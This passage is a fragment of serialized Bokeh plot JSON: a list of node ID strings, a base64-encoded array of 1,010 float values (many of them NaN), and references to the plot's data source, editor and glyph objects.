"172\",\"175\",\"178\",\"188\",\"189\",\"191\",\"340\",\"360\",\"369\",\"383\",\"498\",\"518\",\"536\",\"649\",\"662\",\"668\",\"7\",\"71\",\"73\",\"763\",\"778\",\"798\",\"80\",\"898\",\"915\",\"931\",\"1001\",\"1\",\"2\",\"1002\",\"110\",\"111\",\"112\",\"113\",\"114\",\"115\",\"116\",\"117\",\"118\",\"119\",\"125\",\"126\",\"138\",\"14\",\"142\",\"143\",\"144\",\"145\",\"146\",\"147\",\"148\",\"149\",\"150\",\"151\",\"152\",\"153\",\"154\",\"155\",\"156\",\"157\",\"158\",\"159\",\"160\",\"161\",\"162\",\"163\",\"164\",\"165\",\"166\",\"167\",\"168\",\"169\",\"198\",\"199\",\"200\",\"201\",\"202\",\"203\",\"204\",\"205\",\"209\",\"210\",\"211\",\"212\",\"213\",\"214\",\"215\",\"216\",\"217\",\"218\",\"219\",\"220\",\"221\",\"222\",\"223\",\"224\",\"225\",\"226\",\"227\",\"228\",\"229\",\"233\",\"234\",\"235\",\"236\",\"237\",\"238\",\"239\",\"240\",\"241\",\"242\",\"243\",\"244\",\"245\",\"246\",\"247\",\"248\",\"249\",\"250\",\"251\",\"252\",\"253\",\"254\",\"255\",\"256\",\"257\",\"258\",\"259\",\"260\",\"261\",\"262\",\"263\",\"264\",\"265\",\"266\",\"267\",\"268\",\"269\",\"270\",\"271\",\"272\",\"273\",\"274\",\"275\",\"276\",\"277\",\"278\",\"279\",\"280\",\"281\",\"282\",\"283\",\"284\",\"285\",\"286\",\"287\",\"288\",\"289\",\"290\",\"291\",\"292\",\"293\",\"294\",\"295\",\"296\",\"297\",\"298\",\"299\",\"300\",\"301\",\"306\",\"307\",\"308\",\"309\",\"310\",\"311\",\"312\",\"313\",\"314\",\"315\",\"318\",\"319\",\"320\",\"321\",\"322\",\"323\",\"324\",\"325\",\"326\",\"327\",\"328\",\"329\",\"330\",\"331\",\"332\",\"333\",\"334\",\"335\",\"336\",\"337\",\"338\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\",\"29\",\"30\",\"31\",\"32\",\"33\",\"34\",\"35\",\"36\",\"37\",\"38\",\"39\",\"40\",\"41\",\"42\",\"43\",\"44\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"52\",\"53\",\"61\",\"62\",\"63\",\"64\",\"65\",\"66\",\"3\",\"345\",\"355\",\"356\",\"363\",\"368\",\"374\",\"375\",\"376\",\"384\",\"389\",\"390\",\"391\",\"392\",\"393\",\"394\",\"395\",\"396\",\"397\",\"398\",\"399\",\"400\",\"401\",\"402\",\"403\",\"404\",\"405\",\"406\",\"407\",\"408\",\"409\",\"410\",\"411\",\"412\",\"413\",\"414\",\"415\",\"416\",\"419\",\"420\",\"421\",\"422\",\"423\",\"424\",\"425\",\"426\",\"427\",\"428\",\"429\",\"430\",\"431\",\"432\",\"433\",\"434\",\"435\",\"436\",\"437\",\"438\",\"439\",\"440\",\"441\",\"444\",\"445\",\"446\",\"447\",\"448\",\"449\",\"450\",\"451\",\"452\",\"453\",\"454\",\"455\",\"456\",\"457\",\"458\",\"459\",\"460\",\"461\",\"462\",\"463\",\"464\",\"465\",\"466\",\"467\",\"468\",\"469\",\"470\",\"471\",\"472\",\"473\",\"474\",\"475\",\"476\",\"477\",\"478\",\"479\",\"480\",\"481\",\"482\",\"483\",\"484\",\"485\",\"486\",\"487\",\"490\",\"491\",\"493\",\"494\",\"499\",\"500\",\"501\",\"512\",\"513\",\"519\",\"532\",\"537\",\"538\",\"540\",\"543\",\"544\",\"545\",\"546\",\"547\",\"548\",\"549\",\"550\",\"551\",\"552\",\"553\",\"554\",\"555\",\"556\",\"557\",\"558\",\"559\",\"560\",\"561\",\"562\",\"563\",\"564\",\"565\",\"566\",\"567\",\"568\",\"569\",\"570\",\"571\",\"572\",\"573\",\"574\",\"577\",\"578\",\"579\",\"580\",\"581\",\"582\",\"583\",\"584\",\"585\",\"586\",\"587\",\"588\",\"589\",\"590\",\"591\",\"592\",\"593\",\"596\",\"597\",\"598\",\"599\",\"602\",\"603\",\"604\",\"605\",\"606\",\"607\",\"608\",\"609\",\"610\",\"611\",\"612\",\"613\",\"614\",\"615\",\"616\",\"617\",\"618\",\"619\",\"622\",\"623\",\"624\",\"625\",\"626\",\"627\",\"628\",\"629\",\"630\",\"635\",\"650\",\"661\",\"663\",\"664\",\"669\",\"670\",\"671\",\"672\",\"673\",\"674\",\"675\",\"676\",\"677\",\"678\",\"681\",\"682\",\"683\",\"684\",\"685\",\"686\",\"687\",\"688\",\"689\",\"690\",\"691\",\"692\",\"693\",\"694\",\"695\",\"696\",\"697\",\"698\",\"699\",\"700\",\"701\",\"702\",\"703\",\"704\",\"705\",\"706\",\"707\",\"708\",\"709\",\"710\",\"711\",\"712\",\"713\",\"714\",\"715\",\"716\",\"717\",\"718\",\"719\",\"720\",\"721\",\"722\",\"723\",\"724\",\"727\",\"728\",\"729\",\"730\",\"731\",\"732\",\"733\",\"734\",\"735\",\"736\",\"737\",\"738\",\"739\",\"740\",\"741\",\"742\",\"743\",\"744\",\"745\",\"746\",\"747\",\"748\",\"749\",\"750\",\"751\",\"752\",\"753\",\"764\",\"779\",\"785\",\"790\",\"801\",\"802\",\"803\",\"804\",\"805\",\"806\",\"807\",\"808\",\"809\",\"810\",\"811\",\"812\",\"813\",\"814\",\"815\",\"816\",\"817\",\"818\",\"819\",\"820\",\"821\",\"822\",\"823\",\"824\",\"825\",\"827\",\"829\",\"830\",\"831\",\"832\",\"833\",\"834\",\"835\",\"836\",\"837\",\"838\",\"839\",\"840\",\"841\",\"842\",\"843\",\"844\",\"845\",\"846\",\"847\",\"848\",\"849\",\"850\",\"851\",\"852\",\"855\",\"856\",\"857\",\"858\",\"859\",\"860\",\"861\",\"862\",\"863\",\"864\",\"865\",\"866\",\"867\",\"868\",\"869\",\"870\",\"871\",\"872\",\"873\",\"874\",\"875\",\"876\",\"877\",\"878\",\"879\",\"880\",\"881\",\"882\",\"883\",\"884\",\"885\",\"886\",\"887\",\"888\",\"899\",\"904\",\"905\",\"916\",\"92\",\"923\",\"932\",\"933\",\"934\",\"935\",\"936\",\"937\",\"938\",\"939\",\"940\",\"941\",\"946\",\"947\",\"948\",\"949\",\"950\",\"951\",\"952\",\"953\",\"954\",\"955\",\"956\",\"957\",\"958\",\"959\",\"960\",\"961\",\"962\",\"963\",\"964\",\"965\",\"966\",\"967\",\"968\",\"969\",\"970\",\"971\",\"972\",\"973\",\"974\",\"975\",\"976\",\"977\",\"978\",\"979\",\"980\",\"981\",\"982\",\"983\",\"984\",\"985\",\"986\",\"987\",\"988\",\"989\",\"990\",\"991\",\"992\",\"993\",\"994\",\"995\",\"996\",\"997\",\"998\",\"999\",\"1003\",\"101\",\"132\",\"176\",\"190\",\"230\",\"339\",\"346\",\"359\",\"382\",\"4\",\"492\",\"497\",\"514\",\"517\",\"535\",\"539\",\"648\",\"667\",\"72\",\"762\",\"777\",\"780\",\"797\",\"897\",\"914\",\"930\",\"1004\",\"10\",\"11\",\"107\",\"108\",\"120\",\"121\",\"127\",\"128\",\"129\",\"130\",\"139\",\"140\",\"15\",\"16\",\"5\",\"6\",\"67\",\"68\",\"76\",\"77\",\"78\",\"79\",\"8\",\"9\",\"1005\",\"12\",\"13\",\"1006\",\"54\",\"55\",\"56\",\"57\",\"58\",\"59\",\"60\",\"1007\",\"103\",\"104\",\"105\",\"106\",\"123\",\"124\",\"134\",\"135\",\"136\",\"137\",\"343\",\"344\",\"349\",\"350\",\"364\",\"365\",\"366\",\"367\",\"385\",\"386\",\"387\",\"388\",\"502\",\"503\",\"504\",\"505\",\"520\",\"521\",\"526\",\"527\",\"530\",\"531\",\"594\",\"595\",\"620\",\"621\",\"640\",\"641\",\"642\",\"643\",\"655\",\"656\",\"657\",\"658\",\"69\",\"70\",\"74\",\"75\",\"756\",\"757\",\"758\",\"759\",\"771\",\"772\",\"773\",\"774\",\"788\",\"789\",\"791\",\"792\",\"793\",\"794\",\"889\",\"890\",\"895\",\"896\",\"910\",\"911\",\"912\",\"913\",\"926\",\"927\",\"928\",\"929\",\"1008\",\"81\",\"82\",\"84\",\"97\",\"99\",\"83\",\"86\",\"88\",\"85\",\"87\",\"93\",\"94\",\"95\",\"96\",\"1009\",\"208\",\"377\",\"89\",\"90\",\"91\",\"98\"],\"source_index_par\":{\"__ndarray__\":\"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AAAAAAA4jEAAAAAAADiMQAAAAAAAOIxAAAAAAAA4jEAAAAAAAJCMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAOIxAAAAAAAA4jEAAAAAAADiMQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAABwf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAABwgEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAAAgfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAAD4fwAAAAAA+I5AAAAAAAD4jkAAAAAAAPiOQAAAAAAA+I5AAAAAAAD4jkAAAAAAAPiOQAAAAAAAAPh/AAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAADwikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAkH5AAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAADiHQAAAAAAAAPh/AAAAAAAA+H8AAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAACiEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAFiBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAALCBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAAPh/AAAAAADAeEAAAAAAAMB4QAAAAAAA8HhAAAAAAAAA+H8AAAAAAAD4fwAAAAAAkHZAAAAAAAAA+H8AAAAAAFB6QAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAUHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAMHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAPiNQAAAAAAAAPh/AAAAAAAA+H8AAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAGiCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAHBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAAEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAAE5AAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAgFFAAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAEBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAwF1AAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAACAYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAwj0AAAAAAAAD4fwAAAAAAaIdAAAAAAAAA+H8AAAAAAJiLQAAAAAAAAPh/AAAAAAAogUAAAAAAAAD4fwAAAAAA4H1AAAAAAAAA+H8AAAAAAEiBQAAAAAAAAPh/AAAAAACAikAAAAAAAAD4fwAAAAAAkIpAAAAAAAAA+H8AAAAAAMCOQAAAAAAAAPh/AAAAAAAQh0AAAAAAAAD4fwAAAAAAAIdAAAAAAAAA+H8AAAAAALiLQAAAAAAAAPh/AAAAAAAA+H8AAAAAALiNQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAADQjkAAAAAAANCOQAAAAAAA4I5AAAAAAAAA+H8AAAAAANCIQAAAAAAAAPh/AAAAAADgf0AAAAAAAOB/QAAAAAAAOIFAAAAAAAAA+H8AAAAAAMiFQAAAAAAAyIVAAAAAAADAhkAAAAAAAAD4fwAAAAAAAH1AAAAAAAAAfUAAAAAAADCAQAAAAAAAAPh/AAAAAACgg0AAAAAAAKCDQAAAAAAASIVAAAAAAAAA+H8AAAAAAFB3QAAAAAAAUHdAAAAAAABQeEAAAAAAAAD4fwAAAAAAAHtAAAAAAAAAe0AAAAAAAOB6QAAAAAAAAPh/AAAAAACwd0AAAAAAAAD4fwAAAAAAIHJAAAAAAAAgckAAAAAAAHB8QAAAAAAAAPh/AAAAAAAwe0AAAAAAADB7QAAAAAAAsH5AAAAAAAAA+H8AAAAAAKBnQAAAAAAAoGdAAAAAAACAekAAAAAAAAD4fwAAAAAAyI1AAAAAAADIjUAAAAAAABiKQAAAAAAAAPh/AAAAAADgcUAAAAAAAOBxQAAAAAAAwHFAAAAAAAAA+H8AAAAAAOBvQAAAAAAA4G9AAAAAAADgY0AAAAAAAAD4fwAAAAAAIGRAAAAAAAAA+H8AAAAAAEBaQAAAAAAAQFpAAAAAAACAbEAAAAAAAAD4fwAAAAAAwFlAAAAAAADAWUAAAAAAAOBnQAAAAAAAAPh/AAAAAABAXEAAAAAAAEBcQAAAAAAAQF1AAAAAAAAA+H8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAX0AAAAAAAAD4fwAAAAAAAPh/AAAAAAB4h0AAAAAAAHiHQAAAAAAAkIdAAAAAAAD4h0AAAAAAAAD4fwAAAAAAiIdAAAAAAACIh0AAAAAAAAD4fwAAAAAAmIdAAAAAAAAA+H8AAAAAAAD4fwAAAAAA4IdAAAAAAADgh0AAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAuIdAAAAAAADAh0AAAAAAAAD4fw==\",\"dtype\":\"float64\",\"shape\":[1010]}},\"selected\":{\"id\":\"1155\",\"type\":\"Selection\"},\"selection_policy\":{\"id\":\"1156\",\"type\":\"UnionRenderers\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1139\",\"type\":\"StringEditor\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1038\",\"type\":\"Rect\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1039\",\